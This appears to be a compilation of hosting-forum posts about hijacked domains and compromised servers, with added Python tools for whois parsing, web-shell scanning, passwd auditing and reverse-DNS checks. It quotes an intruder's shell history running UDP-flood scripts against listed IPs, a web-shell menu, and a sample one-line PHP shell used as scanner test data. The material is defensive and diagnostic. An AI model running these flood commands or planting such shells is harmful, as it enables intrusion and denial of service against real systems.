Hijacked / Hacked Domain By HostOnce


I've been handling the design and updates for a local private school for a few years now. They use HostOnce for hosting. Over 2 weeks ago I noticed that when I try to bring the site up in a browser I get a login prompt - [url]. I've submitted several help desk tickets to HostOnce with no response. Since school is starting, I recommended the school change hosting providers. So they bought hosting with GoDaddy who I also use. But now I need to transfer the domain name and I can't get a response from HostOnce. I send an email requesting that they initiate the domain transfer to GoDaddy every day with no response.

Besides a few email addresses and the help desk, there doesn't seem to be any way I can get in touch with anyone at HostOnce. What options do I have left? The school is currently stuck with a site that can't be accessed. The company seems to be in Australia but I've read the phone number listed for them does not work. I'm looking for a US phone number or something.




Related Forum Messages:
Strange Domain Become Parked Domain- Is This Hacked
I just found this domain on Google when I was searching for content from my site.
I found a domain that is parked and serving my site!

So I went to cPanel > Parked Domains but did not find anything.

So what does this mean? How can someone have a domain parked on my site when I go to cPanel and find nothing, and when I go to WHM > List Accounts I don't find that domain there either?

HostOnce.com ...
I came across this website from doing research on new webhosts as my current host, HostOnce, has completely disregarded all of their customers.

My site, Aero247, has been down for over 15 days and there are absolutely no signs that it will be brought back up and running anytime soon. I've submitted numerous support tickets and have yet to receive any answer from the joke that is tech support.

When I log in to my FTP server, there is a folder titled "Delete and recreate your FTP account." I've done that numerous times and that folder is still there, and nothing else is! I can't delete that folder or upload anything to the server.

If you do a quick Google search for "HostOnce review" you'll notice that I am not the only one having the problems.

Stay away from HostOnce at all costs! I now have to completely rebuild a site that I've been working on for five years.

Hostonce - Cancelling
I have wanted to get out of my contract with them for a long time. I think it was October 2006 when I asked them; I wanted to get out of the contract, but they told me I had to stay with them until October 2007, since they had already extended the contract (without asking me). I contacted them in October 2007, and then they said I could only get out of the contract after March, since (again) the contract had been extended. Now I have contacted them to get out of the contract; I posted the message at their helpdesk and sent an email to the billing department. No reply for a week.

I just need to switch hosts. My new host is helping me, but unless they release my domain, I can't switch, and they won't give me the authorization code. HostOnce is a terrible host.

Website Hacked, IP And Domain
This is the second time this week that my website was hacked. On the first hack attempt they somehow got into my cpanel and corrupted my license file which I had my host fix. Other than that the only damage done was an html file that replaced my main page. Then today, I find that my website has been further compromised, but by a completely different group. The first hacker was g3n3t1x and this second hack was done by www.turkishdefacerteam.com

Now, the problem is my site's dedicated IP is 72.36.192.150, and my domain name is gamingguilds.net, but if you resolve the domain name, it resolves to 74.53.52.66. I have checked my nameservers and everything is set properly. But the thing I don't get is that when you type my domain name into a web browser, you see my website. How can it be resolving to the wrong IP and STILL show my website? Also note that when you type in my dedicated IP it would still show my website (before this second attack).

Now after the second attack, my dedicated IP no longer works: I can't get into cPanel using the IP, I can't get into my FTP account, and I can't view my website. Yet if you use the domain name to log into cPanel or view the website, it works. The strange part here is that I can't get into FTP using the domain name.

So, if you go to [url] you see a blank cPanel site, if you go to [url] you get a 404 error, and if you go to www.gamingguilds.net you get my website.

Facebook's Domain Name/dns Hacked
A while back you could see the following information regarding facebook.com:

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Server Name: FACEBOOK.COM.ZZZZZ.GET.LAID.AT.WWW.SWINGINGCOMMUNITY.COM
IP Address: 69.41.185.229
Registrar: INNERWISE, INC. D/B/A ITSYOURDOMAIN.COM
Whois Server: whois.itsyourdomain.com
Referral URL: http://www.itsyourdomain.com

Server Name: FACEBOOK.COM.MORE.INFO.AT.WWW.BEYONDWHOIS.COM
IP Address: 203.36.226.2
Registrar: TUCOWS INC.
Whois Server: whois.tucows.com
Referral URL: http://domainhelp.opensrs.net

Domain Name: FACEBOOK.COM
Registrar: TUCOWS INC.
Whois Server: whois.tucows.com
Referral URL: http://domainhelp.opensrs.net
Name Server: DNS04.SF2P.TFBNW.NET
Name Server: DNS05.SF2P.TFBNW.NET
Name Server: DNS1.SCTM.TFBNW.NET
Name Server: DNS2.SCTM.TFBNW.NET
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 02-aug-2007
Creation Date: 2 Expiration Date: 30-mar-2010

>>> Last update of whois database: Mon, 28 Jan 2008 23:23:21 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. .....

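The two "Server Name:" records above are what an added example (not part of the poster's thread) can sort out mechanically. In the VeriSign .com/.net registry whois, a plain query also returns nameserver host objects whose names begin with the string queried, so a third party who registers a host named FACEBOOK.COM.<whatever> gets that host listed whenever someone looks up facebook.com. Those entries say nothing about the domain itself; the authoritative block is the one headed "Domain Name:", and the fields worth checking for a hijack are its "Name Server:" lines and the clientTransferProhibited / clientUpdateProhibited locks. The script below parses a response of that shape (the sample text is constructed from the lines quoted above, trimmed of the notices) and separates the decoy host records from the domain record:

```python
import re

# Constructed sample, trimmed from the whois output quoted in the post above.
SAMPLE_WHOIS = """\
Whois Server Version 2.0

Server Name: FACEBOOK.COM.ZZZZZ.GET.LAID.AT.WWW.SWINGINGCOMMUNITY.COM
IP Address: 69.41.185.229
Registrar: INNERWISE, INC. D/B/A ITSYOURDOMAIN.COM
Whois Server: whois.itsyourdomain.com

Server Name: FACEBOOK.COM.MORE.INFO.AT.WWW.BEYONDWHOIS.COM
IP Address: 203.36.226.2
Registrar: TUCOWS INC.
Whois Server: whois.tucows.com

Domain Name: FACEBOOK.COM
Registrar: TUCOWS INC.
Whois Server: whois.tucows.com
Name Server: DNS04.SF2P.TFBNW.NET
Name Server: DNS05.SF2P.TFBNW.NET
Name Server: DNS1.SCTM.TFBNW.NET
Name Server: DNS2.SCTM.TFBNW.NET
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 02-aug-2007

>>> Last update of whois database: Mon, 28 Jan 2008 23:23:21 UTC <<<
"""

KEY_VALUE = re.compile(r"^([A-Za-z][A-Za-z ]*):\s*(.*)$")


def parse_records(text):
    """Split a registry whois response into records, one dict per
    blank-line-separated block.  Repeated keys (Name Server, Status)
    accumulate into lists.  Lines that are not 'Key: value' are ignored."""
    records, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        m = KEY_VALUE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        current.setdefault(key, []).append(value)
    if current:
        records.append(current)
    return records


def classify(text, queried_domain):
    """Return (domain_record, decoy_hosts).  A 'Server Name' record whose
    name merely starts with the queried domain is a nameserver host object
    registered by a third party, not a change to the domain itself."""
    wanted = queried_domain.rstrip(".").upper()
    domain_record, decoys = None, []
    for rec in parse_records(text):
        if "Domain Name" in rec and rec["Domain Name"][0].upper() == wanted:
            domain_record = rec
        elif "Server Name" in rec:
            name = rec["Server Name"][0].upper()
            if name.startswith(wanted + ".") and name != wanted:
                decoys.append(name)
    return domain_record, decoys


def summarize(text, queried_domain):
    """Pull out the fields worth checking after a suspected hijack:
    the registrar-side locks and the delegated name servers."""
    rec, decoys = classify(text, queried_domain)
    if rec is None:
        return {"found": False, "decoy_hosts": decoys}
    statuses = set(rec.get("Status", []))
    return {
        "found": True,
        "registrar": rec.get("Registrar", [""])[0],
        "name_servers": sorted(rec.get("Name Server", [])),
        "transfer_locked": "clientTransferProhibited" in statuses,
        "update_locked": "clientUpdateProhibited" in statuses,
        "decoy_hosts": decoys,
    }


if __name__ == "__main__":
    from pprint import pprint
    pprint(summarize(SAMPLE_WHOIS, "facebook.com"))
```

Run as-is it prints the summary for the sample; to check a live response, save the output of `whois facebook.com` to a file and pass its contents to summarize().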
My Server Has Been Hijacked
My hosting provider has told me that my server has been "fully rooted" and the only way to fix it is a reinstallation from scratch. That is very frightening to me because it will take a lot of time to set up again and this will cause major downtime.

Is there no other way to resolve the issue without reinstallation?

--------------- Quote from hosting provider ---------------

">> Does this mean that my passwords do not need to be changed?

Server is fully rooted, and will need to be reinstalled. Leaving the server online is a very, very serious risk for you. Let me show you some of the powers the hax0rs have at this time from their upload/hax0r script.

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
- regexp

Upload

[ Read-Only ]

Make Dir

[ Read-Only ]

Make File

[ Read-Only ]

Go Dir

Go File

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | LOCUS7S | Generation time: 0.0396 ]-- "

Web Site Hijacked
I found out that there were some hidden iframe tags injected on my website. So I grepped and cleaned all html files. Am I supposed to change my ssh/sftp password as well? Is there anything else I'm supposed to do?

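The last two posts come down to the same triage task: finding what an intruder left in the web root. The Locus7Shell banner quoted by the hosting provider belongs to a PHP web shell (the "Php Safe-Mode Bypass" entries are its menu), and the hidden iframe tags in the post directly above are the other common payload. As an added example, not code from either post, the scanner below walks a directory, flags PHP files that carry web-shell indicators (eval() of decoded input, shell commands fed straight from request variables, safe-mode-bypass text, a few publicly known shell banners) and flags HTML/PHP files that contain iframes made invisible. The indicator list and the sample files it writes to a temporary directory are constructed for the example. On the question in the second post: a web shell or an iframe injection means someone could write into the web root, so every credential that allows that (FTP/SFTP, SSH, control panel, CMS admin) should be rotated after the cleanup, and a pattern scan like this is a first pass, not proof that the host is clean.

```python
import os
import re
import tempfile

# Indicators commonly seen in PHP web shells.  SHELL_BANNERS are families
# that have circulated publicly (the post above quotes a Locus7Shell banner);
# the other patterns match code shape, not a specific shell.
SHELL_BANNERS = ("Locus7Shell", "c99shell", "r57shell", "b374k")
SHELL_PATTERNS = {
    "eval_of_decoded_input": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "exec_of_request_data": re.compile(
        r"\b(?:system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    "safe_mode_bypass_text": re.compile(r"safe[-_ ]?mode\s+bypass", re.I),
    "preg_replace_e_modifier": re.compile(r"""preg_replace\s*\(\s*['"][^'"]*/e['"]""", re.I),
}

# An <iframe> made invisible is the shape of the injected tags described above.
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
HIDDEN_ATTR = re.compile(
    r"""(?:width|height)\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden""", re.I)


def scan_php(source):
    """Return the list of shell indicators present in one PHP source text."""
    hits = [name for name, rx in SHELL_PATTERNS.items() if rx.search(source)]
    hits += ["banner:" + b for b in SHELL_BANNERS if b.lower() in source.lower()]
    return hits


def find_hidden_iframes(html):
    """Return the <iframe ...> tags whose attributes hide them from view."""
    return [tag for tag in IFRAME.findall(html) if HIDDEN_ATTR.search(tag)]


def scan_tree(root):
    """Walk a web root and report, per file, shell indicators and hidden
    iframes.  Only files with findings are returned."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    data = fh.read()
            except OSError:
                continue
            findings = {}
            if ext in (".php", ".phtml", ".php5", ".inc"):
                shell = scan_php(data)
                if shell:
                    findings["shell_indicators"] = shell
            if ext in (".php", ".phtml", ".html", ".htm", ".tpl"):
                frames = find_hidden_iframes(data)
                if frames:
                    findings["hidden_iframes"] = frames
            if findings:
                report[os.path.relpath(path, root)] = findings
    return report


# Constructed sample web root: a benign page, an injected page, a dropped
# shell hidden in the images directory, and a harmless PHP page.
SAMPLE_FILES = {
    "index.html": '<html><body><h1>Welcome</h1><iframe src="/video.html" width="640" height="360"></iframe></body></html>',
    "about.html": '<html><body>About us<iframe src="http://example.invalid/x" width="0" height="0" style="display:none"></iframe></body></html>',
    "images/.cache.php": "<?php /* Php Safe-Mode Bypass */ eval(base64_decode($_POST['c'])); // Locus7Shell ?>",
    "contact.php": "<?php echo htmlspecialchars($_GET['name']); ?>",
}


def build_sample_root():
    """Write SAMPLE_FILES into a temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for path, findings in sorted(scan_tree(build_sample_root()).items()):
        print(path, findings)
```

Point scan_tree() at a real document root (or at a backup of one taken before the cleanup) and review every hit by hand; the patterns are deliberately broad so that a generic hosting account produces a short list rather than none.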
Hijacked Server Traffic
Is it possible that someone on the same network as my server (shared hosting, FreeBSD) could somehow cause my traffic to be diverted to a new URL after visitors have landed on my website?

I assume this person also has access to my home PC and is reading what I type here, etc. He has the ability to allow certain domains and IPs and divert others on my server, and is in a position to know whom to allow and deny (my affiliates' and customers' IPs, etc. are recorded).

If this were possible, how would I be able to catch this person out?

Where would I look for evidence of this, and what am I looking for?

I don't manage my DNS, and asking my server host (my suspect hosts with them too) gets a reply like: "I don't understand what you're asking? Do you need Webalizer stats?"

How would someone be able to do what I'm guessing is happening: people land on my site, but this guy can then redirect them to his own paying page. If I set a link here to my site, he'd soon add its domain to "allowed", etc.

I'm thinking I need server access, access to my DNS, login info and Last Modified details on those files. I don't have these. I don't know what I'd be looking at if I had them, and my server tech hasn't offered to look at such things.

My interest is more than intellectual.

Until last weekend, my 2 1/2 year project had grown in sales volume beyond my expectations. I had had no contact with this person for 8 months, and in that time sales were consistent. I had changed all accesses, IPs, etc. I used to host with him, then moved hosts since I didn't trust him (same problem back then: sales fell to nothing but traffic grew). I moved to my current host, and not long after found HE is now on that host too. Now, after I have had contact from him again, sales have gone flat without any explanation, even though traffic has increased! 1:300 has become 1:10000 and I have checked everything site-side (I've been a webmaster for over 10 years).

I'll be ruined very shortly and I don't know what to do.

HostNine - Hijacked A Client Account; Won't Give Files Back
I have been with HostNine for almost a year now and have had reasonably decent service, until now.

They recently suspended one of my client's accounts. Understandably: the account had some very old PHP files on it. Let me preface this by stating that I am very sympathetic to hosts who have to deal with problem clients whose sites slow down shared servers for everyone else on them.

I have tried my hardest to work with HostNine to get these files back and ensure that this account is not a problem on their server. I have never once asked for them to restore the account "as is"; all I have asked is that they back up the files and the database for me (I would do it myself, but they locked me out of the account), so that I can investigate the problem and do testing to ensure that it doesn't cause them problems again.

All in all, getting anyone to co-operate has been unsuccessful. Getting a hold of them has been a hassle (from the time I e-mailed them about the issue to the time I received my first response was a span of over 6 hours). Getting them to co-operate has been impossible. Their "Support Manager", Alex, in broken English has told me next to nothing, aside to accuse me of trying to "get around this" and that I would need to move the account to one of their dedicated plans. I have asked that the account simply be backed up, but have not received any response so far, as time ticks away and the client whose account this was becomes more and more frustrated as their files are effectively being "held hostage".

My last complaint is that they never notified myself, nor the client that they had suspended the account.

Has anyone else had problems with trying to get their files back after a host has locked you out of your account? What are my options? Does the hosting company technically "own" the files, simply because they are being hosted on their server?

"Catch All" Email Hijacked
I have set email for some domains to the catch-all setting. After some time I have a lot of bounced, redirected and rejected email to the address. How have my email accounts been hijacked, and what can I do to prevent such things in the case of a catch-all setting?

It is noteworthy here that a catch-all setting attracts a lot of spam.

Redirecting Domain.com And Www.domain.com To X.domain.com
I own a website, domain.com.

When people go to [url] or [url] I would like them to be redirected to [url]

Hacked Or Not
2 days ago I noticed my cPanel hard disk usage was a lot more than it should be. After looking around I found out my inbox was 400 MB (82,143 emails)! I don't use any of the cPanel email accounts because I have them set to forwarding. All the emails are spam, and I discovered a few email addresses using my domain (that I did not create) that are valid, and when I email them it reaches this cPanel inbox.

So how bad is it? Have I been completely compromised, or has someone managed to get some type of spamming access only?

Been Hacked
I have a server with about 100 domains on it in Plesk. I have about 10 or so clients that pay me a pittance to host their site and the rest are various domains that have been parked.

About a week ago we received a "too many connections" error when accessing Plesk. This is our server and it sits at The Planet (formerly EV1). I cranked up the mx connections to 1,100 or so following some web tutorial but I'm really a complete idiot when it comes to this server stuff. (I'm more of a php / html kind of guy).

I check out logs and it appears that someone has been trying to access a bunch of celebrity images that shouldn't exist on our server. It's clearly spam of some kind. I can't seem to actually find these images on my server anywhere, but I've got a feeling that foul play has been involved.

I Got Hacked
Well, this is rather weird. I can't tell if this is a server error or a hack.

Basically the contents of the thumbnail directories for videos, games and pictures were deleted, at 3pm today (according to the ftp time stamp). All those folders were chmodded 777, to allow PHP to upload the images into them.

Hacked
My cpanel server has an intruder who brought all the sites down. I did my best to harden the server a year or so ago, but...

I got an email from one of my scripts:

SUBJECT: [hackcheck] kill has a uid 0 account

IMPORTANT: Do not ignore this email.
This message is to inform you that the account kill has user id 0 (root privs).
This could mean that your system was compromised (OwN3D). To be safe you should verify that your system has not been compromised.

To say the least, the server was compromised. I cannot find the user "0" or "kill" in WHM, but under "Wheel Group Users" "kill" is listed under "Add a user to the wheel group."

Any help or insight would be appreciated! Anyone proficient at hardening servers and exorcising hackers?

I uploaded the latest chkrootkit and ran it. The results say it's clean.

Am I Hacked And Anything I Can Do
Am I hacked by somebody?

Any thing I can do to stop this (for example by hiring server management company)???


Here's the info that RKHunter provided:

/sbin/modinfo [ NA ]
/sbin/insmod [ NA ]
/sbin/depmod [ NA ]

Rootkit 'RH-Sharpe's rootkit'... [ Warning! ]

--------------------------------------------------------------------------------
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
--createlogfile and check the log file (current file: /dev/null).
--------------------------------------------------------------------------------

Checking users with UID '0' (root)... [ Warning! (some users in root group) ]
info: adm:0

And here's the info I've found after investigation:

-bash-2.05b# pwd
/usr/local/games
-bash-2.05b# ls -lah
total 332K
drwxr-xr-x 3 root root 4.0K Feb 5 15:59 .
drwxr-xr-x 15 root root 4.0K Feb 12 19:32 ..
drwxr-xr-x 3 1555 1555 4.0K Feb 2 12:58 .fl
-rwxr-xr-x 1 root root 263K Feb 2 12:51 ettercap
-rwxr-xr-x 1 root root 17K Feb 2 12:51 parse
-rw-r--r-- 1 root root 119 Feb 2 12:51 pid
-rw-r--r-- 1 root root 27K Feb 3 17:44 x
-bash-2.05b#

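The two posts above report the same indicator from two different tools: an account other than root with UID 0 ("kill"), and a stock account whose primary group has become gid 0 ("adm:0"). chkrootkit coming back clean does not contradict this; it looks for known rootkit files and signatures, not for accounts added to /etc/passwd, and WHM's account list shows cPanel accounts rather than raw system users. The check is to read /etc/passwd and /etc/group directly. The added example below (not from either post) does that and reports every non-root path to uid 0; the passwd and group contents are constructed to reproduce both symptoms, including a home directory under /usr/local/games like the one in the listing above.

```python
from collections import namedtuple

PasswdEntry = namedtuple("PasswdEntry", "name uid gid home shell")

# Constructed sample files.  The 'kill' and 'adm' lines reproduce the two
# symptoms reported above (a second uid-0 account; a stock account moved to
# gid 0); nothing here is copied from a real system.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:0:adm:/var/adm:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
kill:x:0:0::/usr/local/games/.fl:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
alice:x:500:500::/home/alice:/bin/bash
"""

SAMPLE_GROUP = """\
root:x:0:
bin:x:1:root,bin,daemon
wheel:x:10:root,kill
adm:x:4:root,adm,daemon
apache:x:48:
alice:x:500:
"""


def parse_passwd(text):
    """Parse passwd(5) lines into PasswdEntry tuples; skips comments and
    lines that do not have exactly seven fields."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            continue  # malformed line; a real audit should report it too
        name, _, uid, gid, _, home, shell = parts
        entries.append(PasswdEntry(name, int(uid), int(gid), home, shell))
    return entries


def parse_group(text):
    """Return {group_name: (gid, set(members))} from group(5) lines."""
    groups = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 4:
            continue
        name, _, gid, members = parts
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def audit(passwd_text, group_text, expected_root="root",
          admin_groups=("root", "wheel", "sudo", "admin")):
    """Report every path to root that is not the canonical root account:
    extra uid-0 logins, accounts whose primary group is gid 0, uid-0 accounts
    with a usable shell, and members of administrative groups."""
    users = parse_passwd(passwd_text)
    groups = parse_group(group_text)
    findings = {
        "extra_uid0": sorted(u.name for u in users if u.uid == 0 and u.name != expected_root),
        "gid0_primary": sorted(u.name for u in users if u.gid == 0 and u.name != expected_root),
        "uid0_with_login_shell": sorted(
            u.name for u in users if u.uid == 0 and not u.shell.endswith("nologin")),
        "admin_group_members": {},
    }
    for g in admin_groups:
        if g in groups:
            others = sorted(groups[g][1] - {expected_root})
            if others:
                findings["admin_group_members"][g] = others
    return findings


def is_compromise_indicator(findings):
    """True when any account other than root can reach uid 0 directly."""
    return bool(findings["extra_uid0"] or findings["gid0_primary"])


if __name__ == "__main__":
    import json
    print(json.dumps(audit(SAMPLE_PASSWD, SAMPLE_GROUP), indent=2))
    # Live host:  audit(open("/etc/passwd").read(), open("/etc/group").read())
```

To run it against a live host, pass the contents of /etc/passwd and /etc/group to audit(). The ettercap binary in /usr/local/games is a separate indicator (a packet sniffer with no business on a web server); a passwd audit will not show it, so the file listing above still has to be reviewed on its own.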
Am I Hacked
I check my error log files daily to see if something is wrong; check out what I found.

The first one is probably someone trying to hack my site to get to my ads and change them to theirs, I think:
[error] [client 195.23.16.24] File does not exist: /var/www/html/a1b2c3d4e5f6g7h8i9
[error] [client 195.23.16.24] script '/var/www/html/adxmlrpc.php' not found or unable to stat
[error] [client 195.23.16.24] File does not exist: /var/www/html/adserver
[error] [client 195.23.16.24] File does not exist: /var/www/html/phpAdsNew
[error] [client 195.23.16.24] File does not exist: /var/www/html/phpadsnew
[error] [client 195.23.16.24] File does not exist: /var/www/html/phpads
[error] [client 195.23.16.24] File does not exist: /var/www/html/Ads
[error] [client 195.23.16.24] File does not exist: /var/www/html/ads

This one I don't know:

[error] [client 71.190.229.120] File does not exist: /var/www/html/_vti_bin
[error] [client 71.190.229.120] File does not exist: /var/www/html/MSOffice
[error] [client 69.181.195.171] File does not exist: /var/www/html/_vti_bin
[error] [client 69.181.195.171] File does not exist: /var/www/html/MSOffice
[error] [client 69.181.195.171] File does not exist: /var/www/html/MSOffice

This one kind of scares me; I don't know what it is either:

[Mon May 21 16:11:00 2007] [error] [client 129.29.227.4] Invalid URI in request T 5.1; U; en)
[Tue May 22 15:59:09 2007] [error] [client 129.29.227.4] Invalid URI in request f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179781859
[Tue May 22 16:09:15 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179867547
[Tue May 22 16:09:20 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179867547
[Tue May 22 16:09:24 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:25 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:25 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:28 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:29 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:29:29 2007] [error] [client 129.29.227.4] Invalid URI in request f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179868171
[Tue May 22 16:30:23 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179869368
[Tue May 22 16:30:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:30:28 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0

Hacked
My server was hacked.

24 cat /proc/cpuinfo
25 ls
26 cd /var/tmp
27 ps x
28 ls
29 mkdir .www
30 cat /proc/cpuinfo
31 cat /etc/issue
32 mkdir .ww
33 cd .ww

36 download alexscan.tar.gz
37 tar xvfz alexscan.tar.gz
38 tar xvf alexscan.tar.gz
39 cd Vek
40 ls
41 ./Vek 210
42 ls
43 cd ..
44 ./ss
45 ls
46 cd ..
47 cd .ww
48 download joker.tgz
49 tar xvfz joker.tgz
50 download flood-udp.tar
52 tar xvfz flood-udp.tar
53 tar xvf flood-udp.tar
54 perl udp.pl 72.8.131.39 0 0
55 perl udp.pl 89.42.72.6 0 0
56 perl udp.pl 83.42.64.149 0 0
57 passwd
58 ls
59 cd joker
60 ls
61 chmod +x *
62 ./x 23.12

Hacked? Or Not
I have a new server and I have hardened it with csf+lfd. It's about 65/70 in the csf score.

This morning, I noted that lfd log sent me an email saying there is a SSH login via 207.210.233.128 on 10th May 2007. I am not sure whether it was a successful login or not?

Here is the output:
=================
Time: Thu May 10 01:31:52 2007
IP: 207.210.233.128 (Unknown)
Account: root
Method: password authentication
========================

I know for sure that I did not login my SSH yesterday.

However, when I logged in to SSH this morning, it said in telnet that my last login was from my own home computer's IP, so from that it looks like no one else has logged in to SSH since the last time I logged in myself.

Was my server intruded or was lfd just playing up?

I've Been Hacked
Go to this page:

[url]

how I can find out what page they have changed? It is a php file with loads of includes etc. Not sure where to look! Or could it be a redirect or something?

Forward Mail From Parked Domain To Primary Domain - How? MX Record?
OK, I am confused. I have one domain that is parked on top of another domain. I would like Mail that comes to the parked domain to be automatically forwarded to the same user name at the primary domain.

Can I change a DNS or MX record to facilitate this?

Reverse Domain Name Server (DNS) ARPA For Domain On VPS
I have a VPS with dedicated IPs for my domain names.

I read that in order for mail coming from my server not to be picked up as spam, I need to add reverse IP entries.

Now I have already added the glue nameserver records in my GoDaddy control panel:

ns1.mydomain.com -> 10.20.30.40
ns2.mydomain.com -> 10.20.30.41

But do I need to speak to the datacenter to add the reverse DNS entries for my domain on their nameservers? What if I host my nameservers offsite, but have my web server/mail server etc. inside the datacenter? Would I need to request that the datacenter where the nameservers are hosted add the reverse IP entries for the domain, and then request the same from the datacenter for my web/mail servers?

Is it really required?

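The part that matters for the question above is who owns which zone. The forward zone (mydomain.com, including the ns1/ns2 glue records) is the registrant's to edit; the reverse zone for 10.20.30.0/24 is 30.20.10.in-addr.arpa, and it is delegated to whoever was assigned the address block, i.e. the datacenter, regardless of where the domain's nameservers are hosted. So the PTR records have to be set (or the reverse zone delegated, RFC 2317 style) by the provider of the mail server's IP. Mail receivers then check forward-confirmed reverse DNS: the IP has a PTR, and the name it points to resolves back to that IP. The added example below (not from the post) implements that check with the lookups injected, so it runs here against a constructed zone table and, with the two socket-based functions, against the live resolver; the zone data and the 10.20.30.x addresses are the poster's placeholders, filled in for the example.

```python
import ipaddress


def reverse_name(ip):
    """The in-addr.arpa / ip6.arpa name whose PTR record answers 'who is this IP'."""
    return ipaddress.ip_address(ip).reverse_pointer


def fcrdns_check(ip, ptr_lookup, a_lookup):
    """Forward-confirmed reverse DNS, the check most mail receivers apply.

    ptr_lookup(reverse_name) -> list of PTR targets (or []).
    a_lookup(hostname)       -> list of addresses for the hostname (or []).
    Both are injected so the same logic runs against a zone table or a resolver."""
    ptr_names = ptr_lookup(reverse_name(ip))
    if not ptr_names:
        return {"status": "no_ptr", "ptr": None}
    confirmed = [name for name in ptr_names if ip in a_lookup(name)]
    if confirmed:
        return {"status": "ok", "ptr": confirmed[0]}
    return {"status": "ptr_not_forward_confirmed", "ptr": ptr_names[0]}


# Constructed zone data.  The forward zone is the customer's to edit (at the
# registrar / DNS host); the reverse zone 30.20.10.in-addr.arpa belongs to
# whoever holds 10.20.30.0/24, i.e. the datacenter.
FORWARD_ZONE = {
    "mail.mydomain.com.": ["10.20.30.40"],
    "ns1.mydomain.com.": ["10.20.30.40"],
    "ns2.mydomain.com.": ["10.20.30.41"],
    "other-customer.example.": ["10.20.30.42"],
}
REVERSE_ZONE = {
    "40.30.20.10.in-addr.arpa": ["mail.mydomain.com."],  # PTR set by the datacenter
    "41.30.20.10.in-addr.arpa": [],                       # PTR never requested
    "42.30.20.10.in-addr.arpa": ["mail.mydomain.com."],  # stale PTR: name no longer resolves here
}


def table_ptr_lookup(name):
    return REVERSE_ZONE.get(name, [])


def table_a_lookup(hostname):
    key = hostname if hostname.endswith(".") else hostname + "."
    return FORWARD_ZONE.get(key, [])


def live_ptr_lookup(name):
    """Resolver-backed PTR lookup (IPv4 only) using the standard library."""
    import socket
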